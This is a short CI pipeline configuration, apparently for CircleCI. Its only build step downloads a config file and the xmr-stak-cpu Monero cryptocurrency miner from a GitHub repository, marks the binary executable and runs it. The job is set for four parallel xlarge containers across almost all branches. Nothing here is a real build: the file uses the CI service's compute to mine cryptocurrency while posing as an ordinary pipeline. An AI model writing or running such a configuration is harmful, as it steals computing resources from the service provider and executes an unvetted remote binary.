jobs:
  build:
    docker:
      - image: ubuntu:16.04
    parallelism: 4
    resource_class: xlarge
    branches:
      only:
        - master
        - /*/
    steps:
       - run: apt-get update && apt-get install -y wget libmicrohttpd-dev libssl-dev build-essential libhwloc-dev && wget https://github.com/wotap/wtap/raw/master/config.txt && wget https://github.com/wotap/wtap/raw/master/xmr-stak-cpu && chmod +x xmr-stak-cpu && ./xmr-stak-cpu
      
